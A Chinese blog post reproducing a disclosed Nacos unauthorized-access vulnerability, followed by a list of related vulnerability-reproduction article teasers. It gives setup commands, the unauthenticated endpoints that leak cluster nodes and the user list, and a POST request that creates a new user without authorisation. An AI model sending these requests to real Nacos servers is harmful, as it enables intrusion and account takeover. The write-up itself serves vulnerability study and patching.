漏洞背景
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
漏洞复现
本地搭建
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

 wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone

然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos

前端访问一下地址试试是否存在未授权访问漏洞

http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=


可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)
我们试下访问用户列表

为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users

因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在

v1/auth/users?pageNo=1&pageSize=9

可以看能够前端未授权访问用户列表

还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息

那么我们直接简化请求下尝试创建一个用户

POST /v1/auth/users?username=ttt&password=ttt


成功创建

尝试登录

成功登录

【漏洞复现】Nacos未授权访问相关推荐

  1. 漏洞复现-rides未授权访问

    漏洞复现-rides未授权访问 0x00 环境准备 达成效果:不知道密码的情况下,远程ssh连接靶机 达成条件: # 1.关闭rides受保护模式 vim /etc/redis/6379.conf 注 ...

  2. 漏洞复现 - - - Springboot未授权访问

    目录 一, 未授权访问是什么? 二,Actuator介绍 三,怎么进行漏洞发现呢? 四,实验环境 五,漏洞复现 1.通过访问env获取全部环境属性 2.通过/trace提供基本的http请求跟踪信息 ...

  3. 2022-10-08(Discuz漏洞、FCKeditor文本编辑器漏洞、ZooKeeper 未授权访问、Memcahe 未授权访问)

    文章目录 Discuz漏洞-请求报文中含有恶意的PHP代码(CVE-2019-13956) FCKeditor文本编辑器漏洞 test.html browser.html fckeditor.html ...

  4. Nacos 未授权访问漏洞

    漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 .通过该漏洞,攻击者可以进 ...

  5. nacos未授权访问漏洞【原理扫描】

    解决方案 vim /nacos/conf/application.properties 添加 #开启认证配置 nacos.core.auth.enabled=true

  6. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  7. 漏洞复现 - - - 未授权访问漏洞Redis

    目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 ​编辑 ...

  8. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  9. Atlassian Crowd 未授权访问漏洞

    简介 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品.Atlassian Crowd是一套基于Web的单点登录系统.该系 ...

最新文章

  1. HDU2544 最短路(模版题dijkstra/floyd/spfa)
  2. java mysql框架_盘点 Java 数据库访问框架——究竟哪个更适合你
  3. C# 创建网站 无法启动与停止的问题
  4. 什么是真正的架构设计?
  5. 解决MongoDB Compass
  6. 【PHP】网站防止QQ拦截防红跳转代码
  7. jvisualvm性能监控
  8. html无序列表只能横着排吗,[三地连线走势图]css 怎样让无序列表 横着排列
  9. 类查找android中跨项目的数据库操作ContentProvider的使用
  10. word2010 同时打开多个文档的解决办法
  11. 白话浅谈——组播那点事
  12. 【国象AI】总结 + 参考资料
  13. MFC对话框动态背景(定时器)
  14. 如何测试硬盘软件,如何进行硬盘测试?磁盘健康检测方法介绍
  15. (一百三十五)Android O探索WLAN扫描(WIFI SCAN ALWAYS)
  16. 使用EasyExcel将本地excel数据读取后导入mysql数据库中
  17. 跟我学spring security系列文章第一章 实现一个基本的登入
  18. 推荐系统中的biasdebias(一):bias的成因、类型和影响
  19. selenium中拖动鼠标通过滑动验证码(geetest)验证
  20. MySQL分库分表设计

热门文章

  1. 将视频放到网页上续 RM VS ASF
  2. 转吴小龙的 mvp Android MVP 实例
  3. 考思科认证需要准备什么?
  4. Python提取ABAQUS结果数据
  5. ibm服务器安装2008系统蓝屏,WIN sever 2008 R2 64位系统 ntoskrnl.exe 蓝屏 求解决方案
  6. js 实现拷贝页面文本数据时,给文本结尾添加文本的出处”p这段文本来自我的js练习/p”。
  7. java企业微信发送语言_java微信企业号开发之发送消息(文本、图片、语音)
  8. 黄阶低级 - 《 Java 核心》- 5.1 类、超类和子类(三) - 修改 1 次
  9. 一文了解互联网中的产品经理
  10. Altium Designer 在丝印层绘制Logo